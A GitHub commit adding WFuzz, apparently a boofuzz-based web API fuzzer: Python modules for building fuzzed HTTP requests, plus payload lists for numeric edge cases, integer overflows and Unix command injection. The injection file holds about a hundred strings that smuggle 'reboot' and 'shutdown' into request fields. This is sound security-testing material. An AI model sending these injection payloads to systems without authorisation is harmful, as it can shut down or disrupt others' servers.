github-mirrors/wapifuzz
1
0
Fork 0
mirror of https://github.com/ysoftdevs/wapifuzz.git synced 2026-05-10 09:50:03 +02:00
Code Issues 1 Packages Projects Releases 1 Wiki Activity

Init WFuzz state

Browse Source
This commit is contained in:
Jan Stárek
2019-10-09 13:24:01 +02:00
parent 7c3ed5ef0b
commit a5eb2a97e1
114 changed files with 6221 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

96
fuzzer/src/blocks_generator.py Normal file
View File

@@ -0,0 +1,96 @@
import json
from typing import Union
from boofuzz import s_initialize, s_delim, s_static, s_block_start, s_block_end
from request_build_helper import RequestBuildHelper
from configuration_manager import ConfigurationManager
from fuzz_payloads import s_http_string
from fuzzing_json_decoder import FuzzingJsonDecoder
from encodings_helper import EncodingTypes
# 1] General HTTP fuzzing
def generate_http_fuzzed_blocks() -> str:
request_name = "General HTTP fuzzing:"
s_initialize(name=request_name)
s_http_string("GET", name="HTTP method")
s_delim(" ", name="Delimiter between method and path")
s_http_string("/path", encoding=EncodingTypes.ascii, name="HTTP path")
s_delim(" ", name="Delimiter between path and version")
s_http_string("HTTP/1.1\r\n", name="HTTP version")
s_static("Host: " + ConfigurationManager.config["target"]["hostname"] + "\r\n")
s_static("Content-Length: 0" + "\r\n")
s_static("User-Agent: ")
s_http_string("WFuzz", name="User-agent")
s_delim("\r\n\r\n", name="HTTP headers and body delimiter")
return request_name
# 2] URI attributes fuzzing
def generate_url_attributes_fuzzed_blocks(endpoint, request) -> str:
body_str = request["BodyExample"]
body_schema = request["BodySchema"]
is_body_json, json_decoder = _prepare_content_body(body_str, body_schema, True)
request_name = "URI attributes fuzzing: " + \
RequestBuildHelper.get_request_name(endpoint["Uri"], request["Method"])
s_initialize(name=request_name)
_generate_http_header(request, endpoint, fuzzable=True)
_generate_content_body(is_body_json, json_decoder, body_str, fuzzable=False)
return request_name
# 3] Request body fuzzing
def generate_body_fuzzed_blocks(endpoint, request, add_quotation_marks_into_non_string_primitives=False) -> str:
body_str = request["BodyExample"]
body_schema = request["BodySchema"]
is_body_json, json_decoder = _prepare_content_body(body_str, body_schema, add_quotation_marks_into_non_string_primitives)
subcategory_name = " (adding quotation marks)" if add_quotation_marks_into_non_string_primitives else ''
request_name = "Request body fuzzing" + subcategory_name + ": " + RequestBuildHelper.get_request_name(endpoint["Uri"], request["Method"])
s_initialize(name=request_name)
_generate_http_header(request, endpoint, False)
_generate_content_body(is_body_json, json_decoder, body_str, True)
return request_name
def _prepare_content_body(documentation_body_example, documentation_body_schema, add_quotation_marks_into_non_string_primitives):
is_body_json = True if documentation_body_example and RequestBuildHelper.is_string_valid_json(documentation_body_example) else False
json_decoder: Union[FuzzingJsonDecoder, None] = FuzzingJsonDecoder(add_quotation_marks_into_non_string_primitives)
if is_body_json:
json_decoder.decode_dict(json.loads(documentation_body_example))
elif documentation_body_schema:
is_body_json = True
json_decoder.generate_from_schema(documentation_body_schema)
return is_body_json, json_decoder
def _generate_content_body(is_body_json, json_decoder, body_string_example, fuzzable):
if s_block_start("body"):
if is_body_json:
json_decoder.generate_mutations(fuzzable=fuzzable)
elif body_string_example:
s_http_string(body_string_example, name="Whole HTTP body", fuzzable=fuzzable)
s_block_end()
def _generate_http_header(request, endpoint, fuzzable):
s_static(request["Method"].upper() + " ")
RequestBuildHelper.generate_uri(endpoint["Uri"], request["UriAttributes"], ConfigurationManager.config, fuzzable)
s_static(" HTTP/1.1\r\n")
RequestBuildHelper.generate_headers(ConfigurationManager.config)
s_static("\r\n\r\n")

78
fuzzer/src/configuration_manager.py Normal file
View File

@@ -0,0 +1,78 @@
import sys
import json
from typing import Union, List
class ConfigurationManager:
config = None
def __init__(self, config_file_pointer):
ConfigurationManager.config = json.load(config_file_pointer)
self._config_validation()
@staticmethod
def get_startup_command():
return ConfigurationManager.config["startup_command"] if "startup_command" in ConfigurationManager.config else None
@staticmethod
def get_payloads_folders_for_boolean_json_primitive() -> Union[List, None]:
return ConfigurationManager._get_payloads_folders_for_specific_json_primitive("boolean")
@staticmethod
def get_payloads_folders_for_number_json_primitive() -> Union[List, None]:
return ConfigurationManager._get_payloads_folders_for_specific_json_primitive("number")
@staticmethod
def get_payloads_folders_for_string_json_primitive() -> Union[List, None]:
return ConfigurationManager._get_payloads_folders_for_specific_json_primitive("string")
@staticmethod
def _get_payloads_folders_for_specific_json_primitive(json_type: str) -> Union[List, None]:
mapping = ConfigurationManager._get_payloads_to_json_primitives_mapping()
if mapping:
return mapping[json_type] if json_type in mapping else None
else:
return None
@staticmethod
def _get_payloads_to_json_primitives_mapping():
return ConfigurationManager.config["payloads_to_json_primitives_mapping"] if "payloads_to_json_primitives_mapping" in ConfigurationManager.config else None
@staticmethod
def get_reporting_interval():
return ConfigurationManager.config["reporting_interval"]
@staticmethod
def get_keywords_for_endpoints_skipping() -> List:
return ConfigurationManager.config["skipping_endpoints_keywords"]
@staticmethod
def get_target():
return ConfigurationManager.config["target"]
@staticmethod
def is_http_fuzzing_allowed():
return ConfigurationManager.config["http_fuzzing"]
def _config_validation(self):
reporting_interval: Union[int, float] = self.config["reporting_interval"]
response_timeout: Union[int, float] = self.config["response_timeout"]
polling_interval: Union[int, float] = self.config["polling_interval"]
http_fuzzing: bool = self.config["http_fuzzing"]
if response_timeout <= polling_interval or polling_interval <= 0:
print("Wrong timeout and polling interval. Timeout has to be greater than polling interval" +
" and polling interval has to be greater than zero.")
sys.exit(-1)
if reporting_interval <= 0 or reporting_interval < response_timeout:
print("Wrong reporting interval. Should be smaller than response_timeout.")
sys.exit(-1)
if "target" not in ConfigurationManager.config:
print("Missing configuration of target.")
sys.exit(-1)
if http_fuzzing is None:
print("Missing flag for enabling / disabling HTTP fuzzing.")
sys.exit(-1)

51
fuzzer/src/encodings_helper.py Normal file
View File

@@ -0,0 +1,51 @@
import json
import urllib.parse
import base64
from enum import Enum
from typing import Dict, List, Union
class EncodingTypes(Enum):
ascii = 1,
utf8 = 2,
urlencoded = 3,
base64 = 4,
json_string_escaping = 5
class Encoder:
@staticmethod
def encode_string(value: Union[str, bytes], encoding_type: EncodingTypes) -> bytes:
# If value is already in bytes, I assume that is properly encoded
if isinstance(value, bytes):
return value
if encoding_type == EncodingTypes.ascii:
return value.encode('ascii', 'ignore')
elif encoding_type == EncodingTypes.utf8:
return value.encode('utf8', 'ignore')
elif encoding_type == EncodingTypes.urlencoded:
return urllib.parse.quote(value)
elif encoding_type == EncodingTypes.base64:
return base64.b64encode(bytes(value))
elif encoding_type == EncodingTypes.json_string_escaping:
return json.dumps(value)[1:][:-1].encode('utf8', 'ignore')
else:
raise NotImplementedError
@staticmethod
def encode_dict(dictionary, encoding_type: EncodingTypes) -> Union[Dict, List[Dict], bytes]:
if isinstance(dictionary, dict):
return {Encoder.encode_dict(key, encoding_type): Encoder.encode_dict(value, encoding_type)
for key, value in dictionary.items()}
elif isinstance(dictionary, list):
return [Encoder.encode_dict(element, encoding_type) for element in dictionary]
elif isinstance(dictionary, str):
return Encoder.encode_string(dictionary, encoding_type)
else:
return dictionary
@staticmethod
def get_ascii_encoded_quotation_mark():
return Encoder.encode_string("\"", EncodingTypes.ascii)

21
fuzzer/src/fake_socket.py Normal file
View File

@@ -0,0 +1,21 @@
from http.client import HTTPResponse, HTTPException
from typing import Union
from io import BytesIO
class FakeSocket:
def __init__(self, response_str):
self._file = BytesIO(response_str)
def makefile(self, *args, **kwargs):
return self._file
def get_response_object(data) -> Union[HTTPResponse, None]:
try:
source = FakeSocket(data)
response = HTTPResponse(source)
response.begin()
return response
except HTTPException:
return None

80
fuzzer/src/fuzz_payloads.py Normal file
View File

@@ -0,0 +1,80 @@
from typing import List, Dict
from boofuzz import s_group, s_static
from encodings_helper import Encoder, EncodingTypes
from configuration_manager import ConfigurationManager
class FuzzPayloads:
payloads: Dict[str, List[str]] = {}
CUSTOM_PAYLOADS_KEY = "custom"
@staticmethod
def add_payload_to_list(line, directory_name):
if directory_name not in FuzzPayloads.payloads:
FuzzPayloads.payloads[directory_name] = []
if line not in FuzzPayloads.payloads[directory_name]:
FuzzPayloads.payloads[directory_name].append(line)
@staticmethod
def _get_payloads_using_directory_names(directory_names: List[str]) -> List[str]:
directory_names.append(FuzzPayloads.CUSTOM_PAYLOADS_KEY) # Always add custom payloads into any payloads set
payloads: List[str] = []
for directory_name in directory_names:
if directory_name in FuzzPayloads.payloads:
for line in FuzzPayloads.payloads[directory_name]:
payloads.append(line)
return list(set(payloads)) # Remove duplicities
@staticmethod
def get_all_payloads():
return FuzzPayloads._get_payloads_using_directory_names(list(FuzzPayloads.payloads.keys()))
@staticmethod
def _get_specific_type_payloads(payload_folders):
return FuzzPayloads._get_payloads_using_directory_names(payload_folders) if payload_folders else FuzzPayloads.get_all_payloads()
@staticmethod
def get_string_payloads():
payload_folders = ConfigurationManager.get_payloads_folders_for_string_json_primitive()
return FuzzPayloads._get_specific_type_payloads(payload_folders)
@staticmethod
def get_number_payloads():
payload_folders = ConfigurationManager.get_payloads_folders_for_number_json_primitive()
return FuzzPayloads._get_specific_type_payloads(payload_folders)
@staticmethod
def get_boolean_payloads():
payload_folders = ConfigurationManager.get_payloads_folders_for_boolean_json_primitive()
return FuzzPayloads._get_specific_type_payloads(payload_folders)
def s_http_general(value, payloads, fuzzable=True, encoding: EncodingTypes = EncodingTypes.ascii, name=None, add_quotation_marks=False):
# Encode all payloads
encoded_payloads: List[bytes] = []
for payload in payloads:
encoded = Encoder.encode_string(payload, encoding)
if add_quotation_marks:
encoded = Encoder.get_ascii_encoded_quotation_mark() + encoded + Encoder.get_ascii_encoded_quotation_mark()
encoded_payloads.append(encoded)
# Encode default value
default_value = Encoder.encode_string(value, encoding)
if fuzzable:
# noinspection PyTypeChecker
s_group(name, encoded_payloads, default_value)
else:
s_static(default_value)
def s_http_string(value, fuzzable=True, encoding: EncodingTypes = EncodingTypes.ascii, name=None):
s_http_general(value, FuzzPayloads.get_string_payloads(), fuzzable, encoding, name)
def s_http_number(value, fuzzable=True, encoding: EncodingTypes = EncodingTypes.ascii, name=None, add_quotation_marks=False):
s_http_general(value, FuzzPayloads.get_number_payloads(), fuzzable, encoding, name, add_quotation_marks)
def s_http_boolean(value, fuzzable=True, encoding: EncodingTypes = EncodingTypes.ascii, name=None, add_quotation_marks=False):
s_http_general(value, FuzzPayloads.get_boolean_payloads(), fuzzable, encoding, name, add_quotation_marks)

71
fuzzer/src/fuzzer.py Normal file
View File

@@ -0,0 +1,71 @@
import sys
from typing import List
from boofuzz import Session, Target, SocketConnection, s_get, pedrpc
from progress_reporter import report_progress
from configuration_manager import ConfigurationManager
from post_test_case_callback import PostTestCaseCallback
from blocks_generator import generate_http_fuzzed_blocks, generate_url_attributes_fuzzed_blocks, \
generate_body_fuzzed_blocks
class Fuzzer:
def __init__(self, endpoints, loggers: List, protocol: str):
self._endpoints = endpoints
self._loggers = loggers
self._protocol = protocol
self._session = None
self._configure_session()
self._remove_endpoints_by_keywords(ConfigurationManager.get_keywords_for_endpoints_skipping())
if ConfigurationManager.is_http_fuzzing_allowed():
self._generate_http_fuzzing()
self._generate_uri_attributes_fuzzing()
self._generate_request_body_fuzzing()
self._generate_request_body_fuzzing(add_quotation_marks_into_non_string_primitives=True)
def _configure_session(self):
target_config = ConfigurationManager.get_target()
startup_command = ConfigurationManager.get_startup_command()
remote_connection = SocketConnection(target_config["hostname"], target_config["port"], proto=self._protocol)
if startup_command:
process_monitor = pedrpc.Client(target_config["hostname"], 26002)
process_monitor_options = {"start_commands": [startup_command]}
target = Target(connection=remote_connection, procmon=process_monitor, procmon_options=process_monitor_options)
else:
target = Target(connection=remote_connection)
self._session = Session(
target=target,
fuzz_loggers=self._loggers,
post_test_case_callbacks=[PostTestCaseCallback.post_test_callback],
restart_sleep_time=0,
keep_web_open=False,
fuzz_db_keep_only_n_pass_cases=sys.maxsize,
crash_threshold_element=10,
crash_threshold_request=30)
def _generate_http_fuzzing(self):
self._session.connect(s_get(generate_http_fuzzed_blocks()))
def _generate_uri_attributes_fuzzing(self):
for endpoint in self._endpoints:
for request in endpoint["Requests"]:
request_name = generate_url_attributes_fuzzed_blocks(endpoint, request)
self._session.connect(s_get(request_name))
def _generate_request_body_fuzzing(self, add_quotation_marks_into_non_string_primitives=False):
for endpoint in self._endpoints:
for request in endpoint["Requests"]:
request_name = generate_body_fuzzed_blocks(endpoint, request, add_quotation_marks_into_non_string_primitives)
self._session.connect(s_get(request_name))
def _remove_endpoints_by_keywords(self, keywords: List[str]):
for keyword in keywords:
self._endpoints[:] = [endpoint for endpoint in self._endpoints if keyword not in endpoint.get('Uri')]
def fuzz(self):
report_progress(self._session)
self._session.fuzz()

99
fuzzer/src/fuzzing_json_decoder.py Normal file
View File

@@ -0,0 +1,99 @@
import json
from typing import Union
from json_schema_parser import generate_json_dict_from_schema
from fuzz_payloads import s_http_string, s_http_number, s_http_boolean
from encodings_helper import EncodingTypes
class FuzzingJsonDecoder:
def __init__(self, add_quotation_marks_into_non_string_primitives: bool):
self.parts: [JsonStrPart] = []
self.add_quotation_marks_into_non_string_primitives = add_quotation_marks_into_non_string_primitives
def generate_from_schema(self, json_schema):
json_dict = generate_json_dict_from_schema(json_schema)
self.decode_dict(json_dict)
def decode_dict(self, json_dict):
if json_dict is not None:
self._decode_dict(json_dict)
def _decode_dict(self, json_dict, indent='', is_last=True):
self.parts.append(JsonStrPart('{\n', fuzzable=False))
i = 0
for key, val in json_dict.items():
i += 1
is_sub_item_last = True if i == len(json_dict.items()) else False
self.parts.append(JsonStrPart('{} "{}": '.format(indent, key), fuzzable=False))
if isinstance(val, dict):
self._decode_dict(val, indent + ' ', is_sub_item_last)
elif isinstance(val, list) or isinstance(val, tuple):
self.__decode_list(val, indent, is_sub_item_last)
else:
self.__parse_primitive(val, is_sub_item_last)
self.parts.append(JsonStrPart(indent + '}\n' if is_last else indent + '},\n', fuzzable=False))
def __decode_list(self, lst, indent, is_last):
self.parts.append(JsonStrPart('[', fuzzable=False))
i = 0
for item in lst:
i += 1
is_sub_item_last = True if i == len(lst) else False
if isinstance(item, list) or isinstance(item, tuple):
self.__decode_list(item, indent, is_sub_item_last)
elif isinstance(item, dict):
self._decode_dict(item, indent, is_sub_item_last)
else:
self.__parse_primitive(item, is_sub_item_last, True)
self.parts.append(JsonStrPart(']\n' if is_last else '],\n', fuzzable=False))
def __parse_primitive(self, value, is_last, is_in_list=False):
# We need to convert Python data types into JSON primitives variants (e.g. False -> false, sanitization, etc.)
# A little "hack", convert value using built-in JSON parser into dictionary with single value and then parse value
json_value = json.dumps({"value": value})[10:-1]
if type(value) == str:
json_value = json_value[1:-1] # Remove auto-generated quotation marks
self._add_quotation_mark()
self.parts.append(JsonStrPart(json_value, fuzzable=True, json_primitive_type=str, encoding=EncodingTypes.json_string_escaping))
self._add_quotation_mark()
else:
self.parts.append(JsonStrPart(json_value, fuzzable=True, json_primitive_type=type(value), add_quotation_marks_into_payloads=self.add_quotation_marks_into_non_string_primitives))
if not is_last:
self.parts.append(JsonStrPart(', ', fuzzable=False))
if not is_in_list:
self.parts.append(JsonStrPart('\n', fuzzable=False))
def _add_quotation_mark(self):
self.parts.append(JsonStrPart("\"", fuzzable=False))
def generate_mutations(self, fuzzable=True):
sequence_generator = _unique_json_primitive_id()
for part in self.parts:
name = "JSON Primitive, default value: " + part.value + ", id: " + next(sequence_generator)
if part.json_primitive_type == int or part.json_primitive_type == float:
s_http_number(part.value, fuzzable=fuzzable and part.fuzzable, encoding=part.encoding, name=name, add_quotation_marks=part.add_quotation_marks_into_payloads)
elif part.json_primitive_type == bool:
s_http_boolean(part.value, fuzzable=fuzzable and part.fuzzable, encoding=part.encoding, name=name, add_quotation_marks=part.add_quotation_marks_into_payloads)
else:
s_http_string(part.value, fuzzable=fuzzable and part.fuzzable, encoding=part.encoding, name=name)
class JsonStrPart:
def __init__(self, value, fuzzable=True, encoding=EncodingTypes.utf8, json_primitive_type=None, add_quotation_marks_into_payloads=False):
self.value: str = value
self.fuzzable: bool = fuzzable
self.encoding: EncodingTypes = encoding
self.json_primitive_type: Union[type, None] = json_primitive_type
self.add_quotation_marks_into_payloads: bool = add_quotation_marks_into_payloads
def _unique_json_primitive_id():
sequence = 0
while True:
yield str(sequence)
sequence += 1

83
fuzzer/src/json_schema_parser.py Normal file
View File

@@ -0,0 +1,83 @@
from encodings_helper import Encoder, EncodingTypes
def generate_json_dict_from_schema(json_schema):
json_dict = _iterate_over_properties(json_schema)
return json_dict
def _iterate_over_properties(properties):
json_dict = {}
# 1] Just single key-value tuple of JSON structure, recursively decomposing JSON value
if isinstance(properties, tuple):
json_key = properties[0]
json_value = properties[1]
nested = _iterate_over_properties(json_value)
json_dict[json_key] = nested
# 2] Value is an JSON array, need to find out type and generate few array items
elif "Type" in properties and "ArrayItemSchema" in properties and properties["Type"] == "array":
return [_parse_array_schema(properties)]
# 3] Properties contains description of single JSON primitive
elif "Type" in properties and "Format" in properties:
property_type = properties["Type"]
property_format = properties["Format"]
if properties["Example"]:
return _convert_example_to_right_data_type(property_type, properties["Example"])
return _get_example_by_type(property_type, property_format)
# 4] Properties contains JSON dictionary and need to be recursively parsed further
else:
json_values = properties.items()
for value in json_values:
nested = _iterate_over_properties(value)
json_dict = {**json_dict, **nested}
return json_dict
def _parse_array_schema(array_schema):
single_item_schema = array_schema["ArrayItemSchema"]
property_type = single_item_schema["Type"] if "Type" in single_item_schema else None
property_format = single_item_schema["Format"] if "Format" in single_item_schema else None
if property_type and property_format:
return _get_example_by_type(single_item_schema["Type"], single_item_schema["Format"])
else:
return _iterate_over_properties(single_item_schema)
# If there is no example, we have to generate one
# Based on following documentations:
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.0.md
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md
def _get_example_by_type(property_type, property_format):
if property_type == "boolean":
return True
elif property_type == "integer":
return 0
elif property_type == "number":
return 0.0
elif property_type == "string":
if property_format == "byte":
return Encoder.encode_string("example", encoding_type=EncodingTypes.base64)
elif property_format == "binary":
return "01234567"
elif property_format == "date":
return "2002-10-02"
elif property_format == "date-time":
return "2002-10-02T10:00:00-05:00"
elif property_format == "password":
return "string"
else:
return "string"
# Examples from documentation comes as JSON strings, we need to cast them to proper data type
# Should never fail, because parser will throw an error if data type in documentation is not matching
def _convert_example_to_right_data_type(property_type, example_value):
if property_type == "integer":
return int(example_value)
elif property_type == "number":
return float(example_value)
elif property_type == "boolean":
return str(example_value).lower() == "true"
else:
return example_value

176
fuzzer/src/junit_logger.py Normal file
View File

@@ -0,0 +1,176 @@
import copy
import sys
import re
from datetime import datetime
from typing import TextIO
from typing import List, Dict
from boofuzz import helpers, ifuzz_logger_backend
from junit_xml import TestSuite, TestCase
from fake_socket import get_response_object
class JUnitLogger(ifuzz_logger_backend.IFuzzLoggerBackend):
DEFAULT_TEST_SUITE_NAME = "Default test suite"
SKIPPED_TEST_CASE_MESSAGES_REGEX = ["Crash threshold reached for this element, exhausting (\d+) mutants.",
"Crash threshold reached for this request, exhausting (\d+) mutants."]
def __init__(self, file_handle: TextIO = sys.stdout, test_suite_name_delimiter: str = None, hostname: str = None):
self._file_handle = file_handle
self._test_suite_name_delimiter = test_suite_name_delimiter
self._hostname = hostname
self._test_cases = []
self._actual_test_case = None
self._error = None
self._failure = None
self._starting_time = None
self._sent_string = None
self._sent_bytes = None
self._received_string = None
self._received_bytes = None
self._default_value = None
self._mutant_value = None
def open_test_step(self, description):
skipped_count = 0
for skipped_test_case_message_regex in self.SKIPPED_TEST_CASE_MESSAGES_REGEX:
match = re.match(skipped_test_case_message_regex, description)
if match is not None:
skipped_count += int(match.group(1))
if skipped_count > 0:
for i in range(skipped_count):
skipped_test_case = self._create_skipped_test_case(self._actual_test_case.name, i)
self._test_cases.append(skipped_test_case)
def log_check(self, description):
pass
def log_error(self, description):
self._error = description
def log_recv(self, data):
self._received_bytes = helpers.hex_str(data)
self._received_string = data.decode('utf-8')
def log_send(self, data):
self._sent_bytes = helpers.hex_str(data)
self._sent_string = data.decode('utf-8')
def log_info(self, description):
default_value_prefix = "Original value: "
mutation_value_prefix = "Mutation: "
if description.startswith(default_value_prefix):
self._default_value = description[len(default_value_prefix):]
elif description.startswith(mutation_value_prefix):
self._mutant_value = description[len(mutation_value_prefix):]
def open_test_case(self, test_case_id, name, index, *args, **kwargs):
self._actual_test_case = TestCase(name)
self._starting_time = datetime.now()
def log_fail(self, description=""):
self._failure = description
def log_pass(self, description=""):
pass
def close_test_case(self):
elapsed_time = datetime.now() - self._starting_time
self._actual_test_case.elapsed_sec = elapsed_time.total_seconds()
if self._error is not None:
self._actual_test_case.add_error_info(message=self._error, output=self._generate_output_message())
self._actual_test_case.classname = "Error"
elif self._failure is not None:
self._actual_test_case.add_failure_info(message=self._failure, output=self._generate_output_message())
self._actual_test_case.classname = "Failure: " + self._failure
else:
self._actual_test_case.classname = "Success"
response = get_response_object(self._received_string.encode()) if self._received_string else None
if response:
self._actual_test_case.classname += ": " + str(response.status)
self._test_cases.append(copy.deepcopy(self._actual_test_case))
self._actual_test_case = None
self._error = None
self._failure = None
self._starting_time = None
self._sent_string = None
self._sent_bytes = None
self._received_string = None
self._received_bytes = None
self._default_value = None
self._mutant_value = None
def close_test(self):
test_suites = self._generate_test_suites()
TestSuite.to_file(self._file_handle, test_suites, prettyprint=True)
@staticmethod
def _format_log_msg(msg_type, msg=None, data=None) -> str:
# Encode the response data to default encoding
if data and isinstance(data, str):
data = data.encode()
return helpers.format_log_msg(msg_type=msg_type, description=msg, data=data, indent_size=2, format_type='html')
def _separate_test_suite_name(self, test_case_name) -> (str, str):
split = test_case_name.split(self._test_suite_name_delimiter, 1)
if len(split) == 2:
return split[0], split[1]
else:
return None, split[0]
def _generate_test_suites(self) -> List[TestSuite]:
test_suites = {}
for test_case in self._test_cases:
if self._test_suite_name_delimiter is not None:
group_name, test_name = self._separate_test_suite_name(test_case.name)
if group_name is None:
test_suites = self._create_or_append_test(test_suites, test_case, self.DEFAULT_TEST_SUITE_NAME)
else:
test_suites = self._create_or_append_test(test_suites, test_case, group_name)
else:
test_suites = self._create_or_append_test(test_suites, test_case, self.DEFAULT_TEST_SUITE_NAME)
return list(test_suites.values())
def _create_or_append_test(self, test_suites: Dict[str, TestSuite], test_case: TestCase, group_name: str)\
-> Dict[str, TestSuite]:
if group_name not in test_suites:
test_suites[group_name] = TestSuite(group_name, test_cases=[test_case], hostname=self._hostname)
else:
test_suites[group_name].test_cases.append(test_case)
return test_suites
def _generate_output_message(self):
message = ""
if self._default_value is not None:
message += "Default value: " + self._default_value + "\n"
if self._mutant_value is not None:
message += "Mutant value: " + self._mutant_value + "\n"
message += "\n\n"
message += "Sent string:\n"
message += self._sent_string + "\n\n"
message += "Sent bytes: \n"
message += self._sent_bytes + "\n\n\n"
if self._received_string:
message += "Received string:\n"
message += self._received_string + "\n\n"
message += "Received bytes: \n"
message += self._received_bytes
else:
message += "Nothing was received!"
return message
@staticmethod
def _create_skipped_test_case(name, index):
skipped_test_case = TestCase(name + "; Skip index" + str(index))
skipped_test_case.classname = "Skipped"
skipped_test_case.skipped_output = "Skipped test case"
skipped_test_case.elapsed_sec = 0
return skipped_test_case

10
fuzzer/src/parameter.py Normal file
View File

@@ -0,0 +1,10 @@
from typing import Union
class Parameter:
def __init__(self, name: str, value: str, data_type: Union[str, None], data_format: Union[str, None], is_from_config: bool):
self.name = name
self.value = value
self.data_type = data_type
self.data_format = data_format
self.is_from_config = is_from_config

72
fuzzer/src/payloads/lists/numeric/blns-numeric.txt Normal file
View File

@@ -0,0 +1,72 @@
# Source: BLNS (https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt)
0
1
1.00
$1.00
1/2
1E2
1E02
1E+02
-1
-1.00
-$1.00
-1/2
-1E2
-1E02
-1E+02
1/0
0/0
-2147483648/-1
-9223372036854775808/-1
-0
-0.0
+0
+0.0
0.00
0..0
.
0.0.0
0,00
0,,0
,
0,0,0
0.0/0
1.0/0.0
0.0/0.0
1,0/0,0
0,0/0,0
--1
-
-.
-,
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
NaN
Infinity
-Infinity
INF
1#INF
-1#IND
1#QNAN
1#SNAN
1#IND
0x0
0xffffffff
0xffffffffffffffff
0xabad1dea
123456789012345678901234567890123456789
1,000.00
1 000.00
1'000.00
1,000,000.00
1 000 000.00
1'000'000.00
1.000,00
1 000,00
1'000,00
1.000.000,00
1 000 000,00
1'000'000,00
01000
08
09
2.2250738585072011e-308

155
fuzzer/src/payloads/lists/numeric/overflows.txt Normal file
View File

@@ -0,0 +1,155 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/integer-overflow/integer-overflows.txt)
-1
0
0x100
0x1000
0x3fffffff
0x7ffffffe
0x7fffffff
0x80000000
0xfffffffe
0xffffffff
0x10000
0x100000
100
1000
3fffffff
7ffffffe
7fffffff
80000000
fffffffe
ffffffff
10000
100000
256
4096
1073741823
2147483646
2147483647
2147483648
4294967294
4294967295
65536
1048576
# Custom overflows
# UNSIGNED
# 8b -> 255
255
0xff
ff
11111111
0b11111111
# 8b -> 256
256
0x100
100
100000000
0b100000000
# 8b -> 257
257
0x101
101
100000001
0b100000001
# 16b -> 65535
65535
0xffff
ffff
1111111111111111
0b1111111111111111
# 16b -> 65536
65536
0x10000
10000
10000000000000000
0b10000000000000000
# 16b -> 65537
65537
0x10001
10001
10000000000000001
0b10000000000000001
# 32b -> 4294967295
4294967295
0xffffffff
ffffffff
11111111111111111111111111111111
0b11111111111111111111111111111111
# 32b -> 4294967296
4294967296
0x100000000
100000000
100000000000000000000000000000000
0b100000000000000000000000000000000
# 32b -> 4294967297
4294967297
0x100000001
100000001
100000000000000000000000000000001
0b100000000000000000000000000000001
# 64b -> 18446744073709551615
18446744073709551615
0xffffffffffffffff
ffffffffffffffff
1111111111111111111111111111111111111111111111111111111111111111
0b1111111111111111111111111111111111111111111111111111111111111111
# 64b -> 18446744073709551616
18446744073709551616
0x10000000000000000
10000000000000000
10000000000000000000000000000000000000000000000000000000000000000
0b10000000000000000000000000000000000000000000000000000000000000000
# 64b -> 18446744073709551617
18446744073709551617
0x10000000000000001
10000000000000001
10000000000000000000000000000000000000000000000000000000000000001
0b10000000000000000000000000000000000000000000000000000000000000001
# SIGNED (just in decimal)
# 8b -> 127
127
126
128
-127
-128
-129
# 16b -> 32767
32767
32766
32768
-32767
-32769
-32768
# 32b -> 2147483647
2147483647
2147483646
2147483648
-2147483647
-2147483649
-2147483648
# 64b -> 9223372036854775808
9223372036854775808
9223372036854775807
9223372036854775809
-9223372036854775808
-9223372036854775810
-9223372036854775809

2
fuzzer/src/payloads/lists/numeric/reserver-numeric-keywords.txt Normal file
View File

@@ -0,0 +1,2 @@
NaN
inf

175
fuzzer/src/payloads/lists/os-command-injection/unix-injections.txt Normal file
View File

@@ -0,0 +1,175 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-injection-template.txt)
reboot
;reboot
;reboot;
^reboot
|reboot
<reboot
<reboot;
<reboot\n
<reboot%0D
<reboot%0A
&reboot
&reboot&
&&reboot
&&reboot&&
%0Dreboot
%0Dreboot%0D
%0Areboot
%0Areboot%0A
\nreboot
\nreboot\n
'reboot'
`reboot`
;reboot|
;reboot/n
|reboot;
a);reboot
a;reboot
a);reboot
a;reboot;
a);reboot|
FAIL||reboot
CMD=$'reboot';$CMD
;CMD=$'reboot';$CMD
^CMD=$'reboot';$CMD
|CMD=$'reboot';$CMD
&CMD=$'reboot';$CMD
&&CMD=$'reboot';$CMD
%0DCMD=$'reboot';$CMD
FAIL||CMD=$'reboot';$CMD
CMD=$\'reboot\';$CMD
;CMD=$\'reboot\';$CMD
^CMD=$\'reboot\';$CMD
|CMD=$\'reboot\';$CMD
&CMD=$\'reboot\';$CMD
&&CMD=$\'reboot\';$CMD
%0DCMD=$\'reboot\';$CMD
FAIL||CMD=$\'reboot\';$CMD
CMD=$"reboot";$CMD
;CMD=$"reboot";$CMD
^CMD=$"reboot";$CMD
|CMD=$"reboot";$CMD
&CMD=$"reboot";$CMD
&&CMD=$"reboot";$CMD
%0DCMD=$"reboot";$CMD
FAIL||CMD=$"reboot";$CMD
<!--#exec cmd="reboot"-->
;system('reboot')
shutdown
;shutdown
;shutdown;
^shutdown
|shutdown
<shutdown
<shutdown;
<shutdown\n
<shutdown%0D
<shutdown%0A
&shutdown
&shutdown&
&&shutdown
&&shutdown&&
%0Dshutdown
%0Dshutdown%0D
%0Ashutdown
%0Ashutdown%0A
\nshutdown
\nshutdown\n
'shutdown'
`shutdown`
;shutdown|
;shutdown/n
|shutdown;
a);shutdown
a;shutdown
a);shutdown
a;shutdown;
a);shutdown|
FAIL||shutdown
CMD=$'shutdown';$CMD
;CMD=$'shutdown';$CMD
^CMD=$'shutdown';$CMD
|CMD=$'shutdown';$CMD
&CMD=$'shutdown';$CMD
&&CMD=$'shutdown';$CMD
%0DCMD=$'shutdown';$CMD
FAIL||CMD=$'shutdown';$CMD
CMD=$\'shutdown\';$CMD
;CMD=$\'shutdown\';$CMD
^CMD=$\'shutdown\';$CMD
|CMD=$\'shutdown\';$CMD
&CMD=$\'shutdown\';$CMD
&&CMD=$\'shutdown\';$CMD
%0DCMD=$\'shutdown\';$CMD
FAIL||CMD=$\'shutdown\';$CMD
CMD=$"shutdown";$CMD
;CMD=$"shutdown";$CMD
^CMD=$"shutdown";$CMD
|CMD=$"shutdown";$CMD
&CMD=$"shutdown";$CMD
&&CMD=$"shutdown";$CMD
%0DCMD=$"shutdown";$CMD
FAIL||CMD=$"shutdown";$CMD
